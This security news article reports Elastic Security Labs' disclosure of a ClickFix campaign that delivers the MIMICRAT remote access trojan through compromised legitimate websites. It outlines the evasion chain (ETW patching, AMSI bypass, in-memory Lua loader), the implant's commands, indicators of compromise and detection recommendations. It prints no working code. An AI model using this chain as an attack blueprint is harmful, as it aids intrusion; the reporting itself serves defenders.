Threats

ClickFix Campaign Compromises Legitimate Sites to Deploy MIMICRAT — A Custom C++ RAT With 22 Post-Exploitation Commands

Zero Day Wire

2 min read
Share
ClickFix Campaign Compromises Legitimate Sites to Deploy MIMICRAT — A Custom C++ RAT With 22 Post-Exploitation Commands

Elastic Security Labs has disclosed a new ClickFix campaign that leverages compromised legitimate websites as delivery infrastructure to deploy a previously undocumented remote access trojan dubbed MIMICRAT (also tracked as AstarionRAT).

The campaign, discovered earlier this month, demonstrates significant operational sophistication — from multi-stage PowerShell chains that bypass Windows security controls to a custom C++ implant that communicates over HTTPS using HTTP profiles designed to mimic legitimate web analytics traffic.

The suspected end goal is ransomware deployment or data exfiltration.

Compromised Legitimate Sites as Delivery Infrastructure

The infection chain begins with compromised websites spanning multiple industries and geographies. In the case documented by Elastic, the entry point was bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was breached to inject malicious JavaScript.

The injected script loads an externally hosted PHP script that serves a fake Cloudflare verification page — the signature ClickFix social engineering technique — instructing the victim to copy and paste a command into the Windows Run dialog to "verify" themselves.

The campaign supports 17 languages, with lure content dynamically localized based on the victim's browser language settings to maximize reach. Identified victims span multiple geographies, including a U.S.-based university and Chinese-speaking users documented in public forum discussions.

Multi-Stage Evasion Chain

The ClickFix lure triggers a PowerShell execution chain designed to systematically dismantle Windows defensive controls before payload delivery:

  1. Initial PowerShell command contacts the C2 server to retrieve a second-stage script
  2. ETW patching — disables Windows Event Tracing to blind security monitoring
  3. AMSI bypass — patches the Antimalware Scan Interface to prevent PowerShell script detection
  4. Lua-based loader — drops a Lua scripting engine that decrypts and executes shellcode entirely in memory
  5. MIMICRAT deployment — the final payload is loaded without touching disk

MIMICRAT Capabilities

MIMICRAT is a custom C++ implant with a comprehensive feature set across 22 commands for post-exploitation operations:

  • Windows token impersonation — escalate privileges by stealing tokens from other processes
  • SOCKS5 proxy tunneling — route attacker traffic through the victim's network
  • Process and file system control — enumerate, create, modify, and terminate processes and files
  • Interactive shell access — direct command-line access to the compromised system
  • Shellcode injection — inject and execute arbitrary code in remote processes
  • HTTPS C2 communication — all traffic flows over port 443 using HTTP profiles that resemble legitimate web analytics, blending into normal network traffic

Elastic assesses that the campaign shares tactical and infrastructural overlaps with a separate ClickFix campaign documented by Huntress that deploys the Matanbuchus 3.0 loader. That loader serves as a delivery mechanism for the same MIMICRAT implant, suggesting a shared operator or affiliate relationship between the two campaigns.

IOCs

  • Compromised site: bincheck[.]io
  • C2 communication: HTTPS over port 443 with web analytics-style HTTP profiles
  • Loader: Lua-based in-memory shellcode decryptor
  • Implant: MIMICRAT/AstarionRAT (C++ RAT, 22 commands)

Defender Recommendations

  • Monitor for ClickFix patterns — alert on PowerShell execution spawned from mshta.exe or the Windows Run dialog, particularly following browser activity
  • Detect ETW and AMSI tampering — flag processes that patch EtwEventWrite or AmsiScanBuffer in memory
  • Hunt for Lua script execution — Lua interpreters running in enterprise environments are anomalous and should be investigated
  • Inspect HTTPS traffic — look for C2 beaconing patterns disguised as web analytics on port 443
  • Block known infrastructure — add bincheck[.]io to blocklists until confirmed remediated
  • Review ClickFix awareness training — remind users that legitimate services never ask them to paste commands into the Run dialog

Read more

Nx Console VS Code Extension Compromised — 2.2 Million Installs Exposed to Credential Stealer With Sigstore Supply Chain Poisoning Capability

Nx Console VS Code Extension Compromised — 2.2 Million Installs Exposed to Credential Stealer With Sigstore Supply Chain Poisoning Capability

A compromised version of the Nx Console extension — a popular VS Code plugin with over 2.2 million installations — was published to the Visual Studio Code Marketplace after an attacker leveraged stolen developer credentials to inject a multi-stage credential stealer into the official nrwl/nx GitHub repository. The malicious version

By Zero Day Wire
Pre-Stuxnet Sabotage Malware Fast16 Confirmed as Nuclear Weapons Simulation Tampering Tool Dating Back to 2005

Pre-Stuxnet Sabotage Malware Fast16 Confirmed as Nuclear Weapons Simulation Tampering Tool Dating Back to 2005

Symantec and Carbon Black have published a definitive analysis confirming that Fast16, a Lua-based malware framework first surfaced by SentinelOne weeks ago, was purpose-built to sabotage nuclear weapons testing simulations. The findings establish Fast16 as the earliest known cyber sabotage tool targeting nuclear weapons research — predating the first known version

By Zero Day Wire